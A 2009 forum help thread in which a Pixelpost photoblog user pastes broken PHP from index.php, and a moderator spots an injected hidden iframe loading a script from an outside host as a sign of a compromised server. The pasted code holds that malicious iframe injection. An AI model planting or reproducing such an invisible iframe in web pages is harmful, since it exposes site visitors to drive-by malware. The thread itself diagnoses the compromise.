Pixelpost Forum

Pixelpost Forum (http://www.pixelpost.org/forum/index.php)
-   Pixelpost Help (http://www.pixelpost.org/forum/forumdisplay.php?f=10)
-   -   Page error:syntax error: (http://www.pixelpost.org/forum/showthread.php?t=10490)

rando57 05-17-2009 01:24 PM

Page error:syntax error:
 
I have no acess to my frontpage: http://www.randotomson.com/blogi/

It says : Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in .../blogi/index.php on line 300


Code:

// Refererlog
if(isset($_GET['x'])&&$_GET['x'] == "referer") {

        header("HTTP/1.0 404 Not Found");
        header("Status: 404 File Not Found!");
        echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><HTML><HEAD>\n<TITLE>404 Not Found</TITLE>\n</HEAD><BODY><iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>\n<H1>Not Found</H1>\nThe requested URL /index.php was not found on this server.<P>\n<P>Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.\n</BODY></HTML>";
    exit;
}


Line 300 is third from the bottom starting with "echo.... "


Can anybody help me to fix the problem?

Thank you

Dennis 05-17-2009 02:42 PM

HTML Code:

<iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>
This is not our code and is the result of an injection of HTML. Which version of Pixelpost do you use? It is likely your server has been compromised, please download a new package from our website and reupload the files.

rando57 05-17-2009 03:22 PM

Thank you, I'll try to reinstall the pixelpost. I use Pixelpost 1.7.1 and it started to act the fool after i installed the defensio spam filter.

Rando


All times are GMT. The time now is 12:34 AM.

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.